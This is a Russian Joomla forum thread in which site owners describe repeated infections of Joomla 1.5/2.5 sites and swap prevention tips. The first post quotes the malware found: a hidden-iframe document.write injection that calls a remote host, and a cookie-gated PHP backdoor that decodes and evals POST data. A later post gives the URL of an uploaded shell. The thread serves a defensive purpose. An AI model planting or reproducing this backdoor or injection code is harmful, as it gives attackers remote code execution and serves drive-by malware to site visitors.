Безопасность Joomla (Взломы - причины и следствия)

  • 23 Ответов
  • 2913 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

*

Оффлайн Craze

Долго я держал себя в руках, но все же открою топик на эту тему, тк последнее время начинает конкретно надоедать все это.
У меня несколько десятков сайтов, все на разные таматики, версия Joomla 1.5 и 2.5
За последние два месяца частота заражения сайтов начинает напрягать.
Что есть.
К примеру:
Хостинг.
Пароль на FTP в 18 значений, в перемешку буквы и символы
ОС Mac os - сразу исключаю взлом через FTP (может я не прав - поясните)

Сайт Joomla 2.5.9
Стоит:
Akeeba (акиба не самой последней версии, тк PHP 5.2.17)
Zoo
JCE
Jcomments
RSFirewall
sh404SEF
AcyMailing
Widgetkit

на некоторых стоит VirtueMart

Это список основоного, так сказать.

Что обычно происходит.

Вариант 1:
Идет замена .htaccess файла (вписывается код в центр его ил ив конец.) Если права поставить 444, то файл переименовывается, а рядом кладется другой с кодом.

Вариант два 2:
Во всех JS файлах добавляется внизу строчка вида (бывают разные):
;document.write('<iframe src="http://dphttz.rebatesrule.net/64e79f785494a6a4c59cc.SBC8o29lvoUtUsbg?default" name="Sandal" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>');
Вариант 3:
В огромном количестве. практически в каждой паке добавляется файл вида:
b18gr.php
с кодом: <?php echo "#!!#";
Зачем это делается - не пойму. Но некоторые компоненты перестают работать в админке. К примеру Акиба и ZOO
Поясните?

Вариант 4:

Этот вариант работает с вариантом 3 обычно. В некоторых папках создается второй файлик php с рандомным именем, но в нем уже код вида:

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty(
$_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo 
'<textarea id=areatext>';
  eval(
$msg);
  echo 
'</textarea>bg';
  exit;
}}
?>

Иногда на версиях 1.5 можно найти залитый шелл в tmp папку или images, но сейчас вижу это редко.

Вопросы - как вы боритесь с этим? Меня интересует именно предотвращение заражения, а не как вычистить это все. Как чистить и так понятно, а вот как уберечься - не понимаю уже, тк обновления до последних версий не помогают.
Где искать дырку?
Знаю причины в том же JCE были, но сейчас на последних версиях вроде нет.
Была проблема с темой Bluestock для админки, но сейчас это тоже не актуально, вроде как.
Что делать? что делаете вы, как с этим жить? :)

*

Оффлайн draff

  • *******
  • 2819
  • [+]174 / [-]5
  • Пол: Мужской
  • step by step
    • Просмотр профиля

*

Оффлайн Craze

у части сайтов да. между собой не связаны.

*

Оффлайн ELLE

расширения используете не из официальных источников? (шаблоны, модули, плагины, компоненты)

*

Оффлайн Pazys

  • *******
  • 1937
  • [+]241 / [-]4
  • Пол: Мужской
  • <a>А где я ошибся-то?</b>
    • Просмотр профиля
    • Я там - кликайте.
Сайт Joomla 2.5.9
Стоит:
1. Akeeba (акиба не самой последней версии, тк PHP 5.2.17)
2. Zoo
3. JCE
4. Jcomments
5. RSFirewall
6. sh404SEF
7. AcyMailing
8. Widgetkit

ТОчно не скажу, но:
6. 1 год - 39 убитых евнухов
8. Full версия как минимум 29 евреев

Если не платили, то вспоминайте про "Бесплатный сыр бывает только в мышеловке"
И если остальное скачивали не с официальных сайтов - то тоже-самое.

Так что дыры могут быть там.

А хостинг - у меня был один раз лом хостинга ... и пароль тоже не детский .... в духе "6dgam*lT0dK%B6uhR2"
Ишак меня нюхал ...
Если помог - плюсуйте в карму.

*

Оффлайн ELLE

ТОчно не скажу, но:
6. 1 год - 39 убитых евнухов
скажу точно - 3 года - 0 убитых :-) но стоит абсолютно нормальный, правда жутко устаревший :)
последний раз залили каку с год назад по учетке верстальщика и то только в папку /templates/шаблон/*, так как доступ был только в эту папку :)

*

Оффлайн komert

Подскажите реально помогающие БЕСПЛАТНЫЕ  расширения для защиты сайта ?

*

Оффлайн ELLE

Подскажите реально помогающие БЕСПЛАТНЫЕ  расширения для защиты сайта ?
по-моему ТС сам просит помощи, или вы его пост приняли за мануал?

*

Оффлайн draff

  • *******
  • 2819
  • [+]174 / [-]5
  • Пол: Мужской
  • step by step
    • Просмотр профиля
Подскажите реально помогающие БЕСПЛАТНЫЕ  расширения для защиты сайта ?
Хм, а как еще назвать тему, чтобы можно было всем понятно, где можно ознакомится с отзывами о расширениях для защиты?
http://joomlaforum.ru/index.php/topic,195980.0.html

*

Оффлайн master-smeta

у меня сейчас такая же проблема. все сайты на Joomla 2.5.9 заражены этой же самой хренью. причем на одном сайте - вариант 2. а на другом и 3й и 4й тоже. не могу дыру найти. весь сайт скачал, вычистил, залил обратно на хост, через 5 минут опять эта гадость.
Что самое фиговое - код, упомянутый в пункте 2, периодически исчезает (правда после него остается ";" и в итоге в конце файлов видим: ;;;;;;;;;;;;;).
Сам впервые с этим сталкиваюсь. Помогите, если кто может!
P.S. из перечисленных плагинов и компонентов - нет ничего. у меня есть: GKTabs, JSCEditor и aiContactSafe.

*

Оффлайн draff

  • *******
  • 2819
  • [+]174 / [-]5
  • Пол: Мужской
  • step by step
    • Просмотр профиля
у меня сейчас такая же проблема. все сайты на Joomla 2.5.9 заражены этой же самой хренью. причем на одном сайте - вариант 2. а на другом и 3й и 4й тоже. не могу дыру найти.
Сам впервые с этим сталкиваюсь. Помогите, если кто может!
Как помочь ? Информация есть, расширения есть. Ссылка на платную помощь, в подписи

*

Оффлайн SmokerMan

Недавно столкнулся с такой же проблемой)

Зачем это делается - не пойму. Но некоторые компоненты перестают работать в админке. К примеру Акиба и ZOO
Поясните?
Это делается видимо для того что бы прикрыть реальную дыру, которая описана в Вариант 4:. Но это мои предположения.

Адрес сайта можно увидеть? Есть предположения через что это делают.

*

Оффлайн master-smeta

только что поудалял кучу файлов описанных в варианте 4. теперь ни сайт, ни админка не грузятся :(

а вот если jHackGuard отключить, то все грузится
« Последнее редактирование: 07.03.2013, 17:06:11 от master-smeta »

Сегодня разместил на хостинге шаблон. Админка работает хорошо, а вот сайт не открывается. При подключении коннектится к непонятному  хосту:  ... rebatesrule.net. Проверил другие сайты. Открываются, но все обращаются к этому же хосту. Проверил папки и БД - во всех JS файлах вариант 2. Подскажите для начала, как это вычистить?
« Последнее редактирование: 08.03.2013, 02:03:20 от sail-winged »

*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
На счет того как обезопаситься! как минимум знаю несколько эксплоитов только глядя уже по названым компонентам! вследствие чего можно получить целевой доступ к сестеме!
1. сначало закройте потенциально уязвимые месте в компонентах!
2. выставите правильные права на файлы и папки.
3. запретите доступ на выполнение каких либо файлов в папке tmp/
4. поставте дополнительную авторизацию на админку (бейсик авторизацию!)
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

Добрый день.
На моем сайте тоже постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php
Кто может что-то посоветовать.
Файлы постоянно удаляю но через время появляются.
Хостинг выдает сообщения что на сайте вирус.
Сайт http://www.corporationdp.net

Как то попробовал запустить один из файлов http://www.corporationdp.net/tmp/plupload/mil.php
там как бы форма для загрузки

как думаете еще, для временного решения если на заливаемые файлы установить права доступа 000 для исключения их исполнения? Поможет это?
 !
« Последнее редактирование: 30.07.2015, 15:25:53 от angel-w81 »

*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Добрый день.
На моем сайте тоже постоянно в папке сайт/tmp/plupload появляются файлы типа logo.php или sesat_1.php
Кто может что-то посоветовать.
Файлы постоянно удаляю но через время появляются.
Хостинг выдает сообщения что на сайте вирус.
Сайт http://www.corporationdp.net

Как то попробовал запустить один из файлов http://www.corporationdp.net/tmp/plupload/mil.php
там как бы форма для загрузки

как думаете еще, для временного решения если на заливаемые файлы установить права доступа 000 для исключения их исполнения? Поможет это?
 !
вот момент этот уже обсуждался http://joomlaforum.ru/index.php/topic,195980.msg1573058.html#msg1573058
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

При много благодарю. Нашел что искал. *DRINK*

*

Оффлайн cex263

Больше чем уверен - виноват виртуальный хостинг.
Тоже была такая же ерунда, но когда перенёс сайты на VDS, такого больше ни разу не повторялось. Тьфу-тьфу-тьфу!
Пошаговый видеокурс по Joomla 3

*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
Больше чем уверен - виноват виртуальный хостинг.
Тоже была такая же ерунда, но когда перенёс сайты на VDS, такого больше ни разу не повторялось. Тьфу-тьфу-тьфу!
Да, частенько встречаются уязвимые хостинги, причем когда им сообщаешь, бьют себя в грудь и говорят что у них все пучком)))
P.S: Если не секрет у вас что за хостинг был?
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям

*

Оффлайн cex263

Пошаговый видеокурс по Joomla 3

*

Оффлайн wishlight

  • ********
  • 3786
  • [+]221 / [-]1
  • Пол: Мужской
  • skype aqaus.com
    • Просмотр профиля
    • Aqaus
Джино вообще просто сильно разрекламированный хостинг, не имеющий отношения к качеству. Как правило, ждать бесплатной или дешевой поддержки там не стоит.

*

Оффлайн winstrool

  • ******
  • 802
  • [+]41 / [-]2
  • Пол: Мужской
  • Свободен для работы
    • Просмотр профиля
    • Как вылечить сайт от вирусов?
конкретно, я находил багу в джино, которая до сих пор в приватах хранится... уж как полтора года...
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям